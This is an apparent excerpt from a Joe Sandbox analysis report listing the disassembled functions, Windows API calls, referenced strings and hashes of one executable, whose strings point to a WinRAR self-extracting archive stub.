                                                            • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,004FAC5A,00000008,?,00000000,?,004FD22D,?,00000000), ref: 00500E85
                                                            • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,004FAC5A,00000008,?,00000000,?,004FD22D,?,00000000), ref: 00500E8F
                                                            • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,004FAC5A,00000008,?,00000000,?,004FD22D,?,00000000), ref: 00500E9F
                                                            Strings
                                                            • Thread pool initialization failed., xrefs: 00500EB7
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                            • String ID: Thread pool initialization failed.
                                                            • API String ID: 3340455307-2182114853
                                                            • Opcode ID: c63347f2ac8786317f99b28a260d13f3419db09c4ace7a2a84dc9fd8cb69eaa5
                                                            • Instruction ID: 43a2435fc83798b8a49c862d4e465ae9c525ae8bfa06fa88af4a90a475fdb7d5
                                                            • Opcode Fuzzy Hash: c63347f2ac8786317f99b28a260d13f3419db09c4ace7a2a84dc9fd8cb69eaa5
                                                            • Instruction Fuzzy Hash: 43118FB16007089BC3315F6ADC88AABFBECFB65744F104C2EE1DA92280DA7599418B64
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: Malloc
                                                            • String ID: (P$2P$A
                                                            • API String ID: 2696272793-1576226603
                                                            • Opcode ID: 72799dc2782d0453f21b47c818585bacd0c6b7984c38c21834b82fbf293b1ae5
                                                            • Instruction ID: 498d18c8c165f24399b58d3c63fe1fd3a005347172b25e573e3f634ba440a392
                                                            • Opcode Fuzzy Hash: 72799dc2782d0453f21b47c818585bacd0c6b7984c38c21834b82fbf293b1ae5
                                                            • Instruction Fuzzy Hash: 8C011B75901219ABCB14CFA4D8589EFBBF8AF09350B10415AE909E3350D7349A45DF94
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: RENAMEDLG$REPLACEFILEDLG
                                                            • API String ID: 0-56093855
                                                            • Opcode ID: 0dac316960ffff39cf7977639d030a7b21e1c1c4075438ac20ce8a0f8a184dfb
                                                            • Instruction ID: d22fe1a2429d6fb5d2f13fac3c0573ae1fc5ccf9ad07c6a3608a640dfdd337c9
                                                            • Opcode Fuzzy Hash: 0dac316960ffff39cf7977639d030a7b21e1c1c4075438ac20ce8a0f8a184dfb
                                                            • Instruction Fuzzy Hash: 11015E7A604345AFDB158FA4FC48AAA7FB8F769398B040425F805827B0C6719858FBB0
                                                            APIs
                                                              • Part of subcall function 004FE2E8: _swprintf.LIBCMT ref: 004FE30E
                                                              • Part of subcall function 004FE2E8: _strlen.LIBCMT ref: 004FE32F
                                                              • Part of subcall function 004FE2E8: SetDlgItemTextW.USER32(?,0052E274,?), ref: 004FE38F
                                                              • Part of subcall function 004FE2E8: GetWindowRect.USER32(?,?), ref: 004FE3C9
                                                              • Part of subcall function 004FE2E8: GetClientRect.USER32(?,?), ref: 004FE3D5
                                                            • GetDlgItem.USER32(00000000,00003021), ref: 004F135A
                                                            • SetWindowTextW.USER32(00000000,005235F4), ref: 004F1370
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                                            • String ID: P$0
                                                            • API String ID: 2622349952-403496799
                                                            • Opcode ID: f7f7f95873ba347bfce1b635708c612a398a0c8c626f708580e44d7dbd217b21
                                                            • Instruction ID: ada5cb5f9081a73349e3bfb78372894d522bf322bcd945b1623ceb6b03ebbe1a
                                                            • Opcode Fuzzy Hash: f7f7f95873ba347bfce1b635708c612a398a0c8c626f708580e44d7dbd217b21
                                                            • Instruction Fuzzy Hash: E3F08C3110438CEAEF150F61880DABA3F98AF103A5F04851AFE8850AB1DB7CC994EE18
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: __alldvrm$_strrchr
                                                            • String ID:
                                                            • API String ID: 1036877536-0
                                                            • Opcode ID: 15e7b98f52cb345e5770fd34cbf54b95dbf5428e1727e1497290f0e3bad33655
                                                            • Instruction ID: 72b13155d56a4b62c13fe5a05cbf6fb3e97f1b32be50bed649682f0644106a8d
                                                            • Opcode Fuzzy Hash: 15e7b98f52cb345e5770fd34cbf54b95dbf5428e1727e1497290f0e3bad33655
                                                            • Instruction Fuzzy Hash: FDA135769042869FFB218E28C8A17EEBFE5FF51314F28456DE4859B281C2389DC1C791
                                                            APIs
                                                            • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,004F7F69,?,?,?), ref: 004FA3FA
                                                            • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,00000800,?,004F7F69,?), ref: 004FA43E
                                                            • SetFileTime.KERNEL32(?,00000800,?,00000000,?,?,00000800,?,004F7F69,?,?,?,?,?,?,?), ref: 004FA4BF
                                                            • CloseHandle.KERNEL32(?,?,?,00000800,?,004F7F69,?,?,?,?,?,?,?,?,?,?), ref: 004FA4C6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: File$Create$CloseHandleTime
                                                            • String ID:
                                                            • API String ID: 2287278272-0
                                                            • Opcode ID: e3e181723f6de369b91cdaa2881c4a834ddb9c6c24d4857f51da9c83c3c1527f
                                                            • Instruction ID: 1f3ac2018c0b93483d342d1e70525bee6d823be6ec1c4a9d026ab6415c6ef3c6
                                                            • Opcode Fuzzy Hash: e3e181723f6de369b91cdaa2881c4a834ddb9c6c24d4857f51da9c83c3c1527f
                                                            • Instruction Fuzzy Hash: BC41B2712483859AD731DF24DC49BAFBBE4AF85300F04091EB6D9932C0D6A89A5CDB57
                                                            APIs
                                                            • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,005191E0,?,00000000,?,00000001,?,?,00000001,005191E0,?), ref: 0051C9D5
                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0051CA5E
                                                            • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00516CBE,?), ref: 0051CA70
                                                            • __freea.LIBCMT ref: 0051CA79
                                                              • Part of subcall function 00518E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0051CA2C,00000000,?,00516CBE,?,00000008,?,005191E0,?,?,?), ref: 00518E38
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                            • String ID:
                                                            • API String ID: 2652629310-0
                                                            • Opcode ID: 3bcd7730033c84117beb69a278a284d11f7eb86dcd57a2b6af2af73f004e5e8e
                                                            • Instruction ID: a7cad7888bb1186b49bcbabb1b851848f88b0a4a2d7370101120663b4c39cbe1
                                                            • Opcode Fuzzy Hash: 3bcd7730033c84117beb69a278a284d11f7eb86dcd57a2b6af2af73f004e5e8e
                                                            • Instruction Fuzzy Hash: 33319C72A0021AABEB25DF64DC45DEE7FA6FF41310F144268E804A6290EB36DD95DB90
                                                            APIs
                                                            • GetDC.USER32(00000000), ref: 0050A666
                                                            • GetDeviceCaps.GDI32(00000000,00000058), ref: 0050A675
                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0050A683
                                                            • ReleaseDC.USER32(00000000,00000000), ref: 0050A691
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: CapsDevice$Release
                                                            • String ID:
                                                            • API String ID: 1035833867-0
                                                            • Opcode ID: e91901a931ab2eac8be4715296e819104f764f61fa6f3f3f9e4a17e88fcf3378
                                                            • Instruction ID: b8b40efad7369eaf427139cac2d042ebdbe1860a073e3298969b4e64ff99289e
                                                            • Opcode Fuzzy Hash: e91901a931ab2eac8be4715296e819104f764f61fa6f3f3f9e4a17e88fcf3378
                                                            • Instruction Fuzzy Hash: 6CE01D31952721B7D7515B607C1DB9B3E54AB25B93F010101F609951F0DB7487089B91
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: _wcschr
                                                            • String ID: .lnk$dP
                                                            • API String ID: 2691759472-3456662748
                                                            • Opcode ID: 2544d4703a31ec6af30697c05d994cd370b17cc24b3bfb7f7a7567244fbd1f64
                                                            • Instruction ID: 6cac1d9d86ae12b00f9a449be385f63441eebe509da61258517f4ec24866f0d2
                                                            • Opcode Fuzzy Hash: 2544d4703a31ec6af30697c05d994cd370b17cc24b3bfb7f7a7567244fbd1f64
                                                            • Instruction Fuzzy Hash: 5DA1517690022A96DF24DBA0DD49EFF77FCAF44304F0885A6B509E7181EE359B848B71
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 004F75E3
                                                              • Part of subcall function 005005DA: _wcslen.LIBCMT ref: 005005E0
                                                              • Part of subcall function 004FA56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 004FA598
                                                            • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 004F777F
                                                              • Part of subcall function 004FA4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,004FA325,?,?,?,004FA175,?,00000001,00000000,?,?), ref: 004FA501
                                                              • Part of subcall function 004FA4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,004FA325,?,?,?,004FA175,?,00000001,00000000,?,?), ref: 004FA532
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: File$Attributes$CloseFindH_prologTime_wcslen
                                                            • String ID: :
                                                            • API String ID: 3226429890-336475711
                                                            • Opcode ID: ce2c42cb08beca68213b380c6bcff0ddb0ad71d25078fb9d4757f92837f3fbe6
                                                            • Instruction ID: 2b882ce2d8d4b99e80cea4a3d0ea2a1cb453ce75966b983e33c8d8465573bc91
                                                            • Opcode Fuzzy Hash: ce2c42cb08beca68213b380c6bcff0ddb0ad71d25078fb9d4757f92837f3fbe6
                                                            • Instruction Fuzzy Hash: F3416E7180015CAAEB25EB65CC59EFFB778EF45304F0040ABA709A2192DB7C5F85CB65
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: _wcschr
                                                            • String ID: *
                                                            • API String ID: 2691759472-163128923
                                                            • Opcode ID: 7bad681d56ae6b9dc73e850eb2b638c2dc5c1d79ace2b0c7f461199713523c32
                                                            • Instruction ID: f05cdf8e994ed672d0f7ff0ffe2cdb9da1bac955cba1aa1f0b59366d49edd9ca
                                                            • Opcode Fuzzy Hash: 7bad681d56ae6b9dc73e850eb2b638c2dc5c1d79ace2b0c7f461199713523c32
                                                            • Instruction Fuzzy Hash: DF3116261443199A9A30AE14CB0267B73E9DF93B14F14851FFF8447283E72D8C8292EA
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: _wcslen
                                                            • String ID: }
                                                            • API String ID: 176396367-4239843852
                                                            • Opcode ID: 79f463cecbc444c182ea568b1cc41fd018c47e18aae80602feffd682fef45e04
                                                            • Instruction ID: 73e09a38574f3842b992b1152f7184232495394b2f7d94e7b0a0b13c37d2a78e
                                                            • Opcode Fuzzy Hash: 79f463cecbc444c182ea568b1cc41fd018c47e18aae80602feffd682fef45e04
                                                            • Instruction Fuzzy Hash: CC2107725043065AE730DA64DC89E6EBBDCFF81710F04082AF540C3181F7659E8883A2
                                                            APIs
                                                              • Part of subcall function 004FF2C5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 004FF2E4
                                                              • Part of subcall function 004FF2C5: GetProcAddress.KERNEL32(005381C8,CryptUnprotectMemory), ref: 004FF2F4
                                                            • GetCurrentProcessId.KERNEL32(?,?,?,004FF33E), ref: 004FF3D2
                                                            Strings
                                                            • CryptProtectMemory failed, xrefs: 004FF389
                                                            • CryptUnprotectMemory failed, xrefs: 004FF3CA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$CurrentProcess
                                                            • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                                            • API String ID: 2190909847-396321323
                                                            • Opcode ID: 4b5a1d9ec7c9f946f3bf85ffa9d7bb50e10aaa38bd8aca10048b55e04c620670
                                                            • Instruction ID: 7eb62c510fa98e49a79ad44903137ea09160e9c34f6e589d137fba8037d39a21
                                                            • Opcode Fuzzy Hash: 4b5a1d9ec7c9f946f3bf85ffa9d7bb50e10aaa38bd8aca10048b55e04c620670
                                                            • Instruction Fuzzy Hash: AB11333160062DABDF299B21DC46A3F3B54FF11B20B01402BFD415B391DA7C9E0A9699
                                                            APIs
                                                            • CreateThread.KERNEL32(00000000,00010000,00501160,?,00000000,00000000), ref: 00501043
                                                            • SetThreadPriority.KERNEL32(?,00000000), ref: 0050108A
                                                              • Part of subcall function 004F6C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004F6C54
                                                              • Part of subcall function 004F6DCB: _wcschr.LIBVCRUNTIME ref: 004F6E0A
                                                              • Part of subcall function 004F6DCB: _wcschr.LIBVCRUNTIME ref: 004F6E19
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: Thread_wcschr$CreatePriority__vswprintf_c_l
                                                            • String ID: CreateThread failed
                                                            • API String ID: 2706921342-3849766595
                                                            • Opcode ID: 89b67c43ab1c6555e97a257cebed181ac4ec17317491ed4920447822865af488
                                                            • Instruction ID: d71ba5b168a98285562f2ae4fa6f0308a711cc9713c5e7071cb42b52aa2f3d11
                                                            • Opcode Fuzzy Hash: 89b67c43ab1c6555e97a257cebed181ac4ec17317491ed4920447822865af488
                                                            • Instruction Fuzzy Hash: 4C0149B63007496FD3345F34EC9AB7A7BA8FB50750F20042EF6C3522D0CAA16885862D
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: _wcschr
                                                            • String ID: <9R$?*<>|"
                                                            • API String ID: 2691759472-2207903549
                                                            • Opcode ID: f0d7c8802fc505dba60fa9c5b74de986a0b2f953e4fc6591b7945d4a16933089
                                                            • Instruction ID: 84f80607387045cd1e49f990837c2e8a047c657475f6c3b47a1ce08d31908cbe
                                                            • Opcode Fuzzy Hash: f0d7c8802fc505dba60fa9c5b74de986a0b2f953e4fc6591b7945d4a16933089
                                                            • Instruction Fuzzy Hash: 7EF0A21394530E89C7341EA4AA41733A3E4EF92720F24081FE6C4873C2EAA988C28259
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: _wcslen
                                                            • String ID: Software\WinRAR SFX$P
                                                            • API String ID: 176396367-3520587227
                                                            • Opcode ID: c79dc550c74c9559442199a69065c756e3cc731e1cc567f04a2b07dbbbc60d22
                                                            • Instruction ID: a7ec87e9d4b4d1e941b0e007d7d0d2f57062ddd757d6832b438aa3b671b9c3a7
                                                            • Opcode Fuzzy Hash: c79dc550c74c9559442199a69065c756e3cc731e1cc567f04a2b07dbbbc60d22
                                                            • Instruction Fuzzy Hash: E7012871900228BAEF229B95DC0EFDF7F7CFB55791F000052B549A10E1E7B19A98DAA1
                                                            APIs
                                                              • Part of subcall function 004FC29A: _wcslen.LIBCMT ref: 004FC2A2
                                                              • Part of subcall function 00501FDD: _wcslen.LIBCMT ref: 00501FE5
